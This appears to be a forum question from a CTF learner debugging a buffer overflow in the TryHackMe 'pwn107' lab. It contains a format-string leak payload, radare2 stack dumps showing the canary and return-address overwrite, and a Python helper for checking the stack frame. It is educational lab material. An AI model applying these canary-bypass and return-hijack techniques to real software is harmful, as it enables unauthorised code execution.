Debugging a buffer overflow using ret2get_address()


I am trying to exploit a buffer overflow from TryHackMe > PWN101 > pwn107.

The exploit uses a format string vulnerability to leak both the canary and a dynamic address so that we can calculate the address of get_address(), a.k.a. our win function (which contains /bin/sh), and hijack the return address. We must also overwrite the canary with itself.

I am writing my exploit in python, using pwntools and debugging using radare2.

The file has PIE, NX and a canary.

I have successfully leaked the canary and the dynamic address of main. (Well, I really think it's main because it displays in radare2 as: 0x7ffd3045a928 0x0000560418400992 [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107')

I can successfully overwrite the canary as I do not receive a "stack-smashing" error.

By sending a format string of "%13$lx.%17$lx", our stack looks like this:

[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125   %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731   17$lx...
0x7ffd3045a8e0 0x0000000000000002   ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff   ........ 260832255
0x7ffd3045a8f0 0x00007ffd3045ad29   ).E0.... [stack] stack R W 0x34365f363878 x86_64
0x7ffd3045a8f8 0x0000000000000064   d....... 100 ascii ('d')
0x7ffd3045a900 0x0000000000001000   ........ 4096
0x7ffd3045a908 0xd0f326fd5de89c00   ...].&..
0x7ffd3045a910 0x0000000000000001   ........ @ rbp 1
0x7ffd3045a918 0x00007f5b1f029d90   ....[... /usr/lib/x86_64-linux-gnu/libc.so.6 library R X 'mov edi, eax' 'libc.so.6'
0x7ffd3045a920 ..[ null bytes ]..   00000000 
0x7ffd3045a928 0x0000560418400992   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a930 0x000000013045aa10   ..E0.... 5104839184
0x7ffd3045a938 0x00007ffd3045aa28   (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a940 ..[ null bytes ]..   00000000 
0x7ffd3045a948 0x30f586575c89a646   F..\W..0
0x7ffd3045a950 0x00007ffd3045aa28   (.E0.... [stack] r12 stack R W 0x7ffd3045c3d6
0x7ffd3045a958 0x0000560418400992   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text main,main,r13,r9 main program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a960 ..[ null bytes ]..   00000000 
*** deleted irrelevant lines***

Our canary is at 0x7ffd3045a908, the return address is at 0x7ffd3045a918, and the address of main() that we will leak to bypass PIE is at 0x7ffd3045a928.

Then after successfully leaking the canary and address of main(), our stack looks like this:

[0x560418400a36]> pxr @ rsp
0x7ffd3045a8d0 0x252e786c24333125   %13$lx.% @ rsp ascii ('%')
0x7ffd3045a8d8 0x00000a786c243731   17$lx...
0x7ffd3045a8e0 0x0000000000000002   ........ 2
0x7ffd3045a8e8 0x000000000f8bfbff   ........ 260832255
0x7ffd3045a8f0 0x4141414141414141   AAAAAAAA @ rsi ascii ('A')
0x7ffd3045a8f8 0x4141414141414141   AAAAAAAA ascii ('A')
0x7ffd3045a900 0x4141414141414141   AAAAAAAA ascii ('A')
0x7ffd3045a908 0xd0f326fd5de89c00   ...].&..
0x7ffd3045a910 0x4242424242424242   BBBBBBBB @ rbp ascii ('B')
0x7ffd3045a918 0x00000000000006fe   ........ 1790
0x7ffd3045a920 0x000056041840094c   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text get_streak sym.get_streak program R X 'push rbp' 'pwn107.pwn107'
0x7ffd3045a928 0x000056041840090a   [email protected].. /home/ceej/tryHackMe/pwn107/pwn107.pwn107 .text sym.setup program R X 'add eax, 0xfffe10e8' 'pwn107.pwn107'
*** deleted irrelevant lines***

As you can see, the canary was properly overwritten, rbp was overwritten, a ret gadget (for stack alignment) was placed, and then we properly hijacked the return address. So why isn't a shell being popped?
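One way to triage a frame like the second dump above, the same way an analyst walks a crash dump, is to parse the pxr lines and test the canary slot and each control-flow slot above the saved rbp against the leaked PIE address. This is an added example, not code from the question; it assumes the binary's text mapping starts at the page containing the leaked main address and is small (a heuristic 1 MiB span), and the dump excerpt, canary and rbp values are copied from the post.

```python
import re

# Constructed excerpt of the post's second `pxr @ rsp` dump (stack addresses
# and qwords copied from the post; radare2's trailing annotations shortened).
PXR_AFTER = """\
0x7ffd3045a900 0x4141414141414141   AAAAAAAA ascii ('A')
0x7ffd3045a908 0xd0f326fd5de89c00   ...].&..
0x7ffd3045a910 0x4242424242424242   BBBBBBBB @ rbp ascii ('B')
0x7ffd3045a918 0x00000000000006fe   ........ 1790
0x7ffd3045a920 0x000056041840094c   ... sym.get_streak
0x7ffd3045a928 0x000056041840090a   ... sym.setup
"""
LEAKED_CANARY = 0xd0f326fd5de89c00   # the %13$lx leak in the post
LEAKED_MAIN = 0x0000560418400992     # the %17$lx leak in the post
RBP = 0x7ffd3045a910                 # the slot radare2 marks "@ rbp"

LINE_RE = re.compile(r"^(0x[0-9a-f]+)\s+(0x[0-9a-f]+)")

def parse_pxr(dump):
    """Map stack address -> qword for every 'addr value ...' line of a pxr dump."""
    frame = {}
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            frame[int(m.group(1), 16)] = int(m.group(2), 16)
    return frame

def classify_slot(value, pie_base, span=0x100000):
    """Heuristic: where does a qword in a control-flow slot point?  Assumes
    (assumption) the PIE text mapping starts at `pie_base` and is < span bytes."""
    if value is None:
        return "not present in dump"
    if value < 0x10000:          # below any mappable user address
        return "raw offset (no PIE base added)"
    if pie_base <= value < pie_base + span:
        return "inside binary text mapping"
    return "outside binary mapping"

def check_frame(frame, rbp, canary, leaked_text_addr, slots=3):
    """Check the canary at rbp-8, then classify the return slot at rbp+8 and
    the following qwords that a ret-gadget / ret2win chain has to fill."""
    report = {"canary_ok": frame.get(rbp - 8) == canary}
    pie_base = leaked_text_addr & ~0xfff   # page-align the leaked address
    for i in range(1, slots + 1):
        addr = rbp + 8 * i
        report[addr] = classify_slot(frame.get(addr), pie_base)
    return report
```

Any slot reported as "raw offset" or "outside binary mapping" is the first place to look before asking why no shell appears.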
